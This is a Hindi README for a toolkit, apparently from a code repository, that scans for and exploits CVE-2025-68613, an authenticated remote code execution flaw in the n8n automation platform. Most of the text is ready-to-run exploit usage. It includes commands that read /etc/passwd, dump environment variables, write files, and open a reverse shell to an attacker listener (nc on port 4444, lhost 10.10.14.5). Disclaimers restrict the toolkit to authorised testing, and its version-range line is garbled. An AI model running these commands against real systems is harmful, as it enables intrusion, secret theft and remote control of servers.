
n8n में CVE-2025-68613 के लिए प्रमाणित RCE एक्सप्लॉइट PoC और भेद्यता स्कैनर। कमांड निष्पादन, फ़ाइल संचालन और अधिकृत सुरक्षा परीक्षण के लिए reverse shell payloads का समर्थन करता है।
यह टूलकिट CVE-2025-68613 नामक महत्वपूर्ण भेद्यता के लिए स्कैनर और एक्सप्लॉइट PoC प्रदान करता है, जो n8n वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म को प्रभावित करती है।
यह रिपॉज़िटरी n8n वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म को प्रभावित करने वाली महत्वपूर्ण CVE-2025-68613 भेद्यता के लिए स्कैनर और एक्सप्लॉइट PoC स्क्रिप्ट प्रदान करती है।
यह टूल केवल वैध और अधिकृत सुरक्षा परीक्षण के लिए है। मालिक की अनुमति के बिना इस टूल का उपयोग सिस्टम पर करना प्रतिबंधित है।
यह टूल केवल अधिकृत और कानूनी सुरक्षा परीक्षण के लिए है। अनधिकृत उपयोग अवैध और निषिद्ध है।
0.211.0 – 1.120.31.121.01.120.4+1.121.1+1.122.0+.
├── tot-scanner-2025-68613.py # भेद्यता स्कैनर (कोई एक्सप्लॉइट नहीं)
├── tot-exploit-2025-68613.py # प्रमाणित RCE एक्सप्लॉइट PoC
├── requirements.txt
└── README.md
स्कैनर का उपयोग निम्न के लिए किया जाता है:
स्कैनर:
स्कैनर निम्नलिखित एंडपॉइंट की जाँच करता है:
//rest/settings/healthz/api/v1/healthआवश्यक पैकेज:
requirements.txt फ़ाइल की सामग्री:
requests>=2.28.0
आवश्यक पैकेज:
requirements.txt सामग्री:
requests>=2.28.0
pip install -r requirements.txt
python3 tot-scanner-2025-68613.py -u http://target.com:5678
python3 tot-scanner-2025-68613.py -u http://target.com:5678 --json
{
"target": "http://target.com:5678",
"detected": true,
"version": "1.121.0",
"vulnerable": true,
"status": "vulnerable",
"cve": "CVE-2025-68613"
}
| कोड | अर्थ |
|---|---|
| 0 | संवेदनशील नहीं |
| 1 | संस्करण अज्ञात |
| 2 | संवेदनशील |
इस एक्सप्लॉइट के लिए वैध n8n क्रेडेंशियल आवश्यक हैं
प्रमाणित पहुँच अनिवार्य है
एक्सप्लॉइट इस प्रकार काम करता है:
Set नोड पर दुर्भावनापूर्ण एक्सप्रेशन डालें| तर्क | आवश्यक | विवरण |
|---|---|---|
-u / --url | ✅ | लक्ष्य n8n URL |
-e / --email | ✅ | n8n खाता ईमेल |
-p / --password | ✅ | n8n खाता पासवर्ड |
--payload | ✅ | पेलोड प्रकार |
--command | ❌ | OS कमांड (cmd) |
--file | ❌ | फ़ाइल पथ (read/write) |
--content | ❌ | फ़ाइल सामग्री (write) |
--lhost | ❌ | हमलावर IP (revshell) |
--lport | ❌ | हमलावर पोर्ट (revshell) |
--verify-ssl | ❌ | SSL प्रमाणपत्र सत्यापित करें |
| पेलोड | कार्य |
|---|---|
info | सिस्टम जानकारी |
cmd | कमांड निष्पादन |
env | पर्यावरण डंप |
read | फ़ाइल पढ़ें |
write | फ़ाइल लिखें |
revshell | रिवर्स शेल |

python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload info
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload cmd --command "id"
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload read --file /etc/passwd
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload write --file /tmp/pwned.txt --content "owned"
nc -lvnp 4444
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444
/rest/* एंडपॉइंट तक पहुँच प्रतिबंधित करेंयह प्रोजेक्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।
लेखक दुरुपयोग के लिए जिम्मेदार नहीं है।
n8n
cve
cve-2025-68613
rce
expression-injection
security
pentest
red-team
blue-team
python
कानूनी रहें। नैतिक रहें।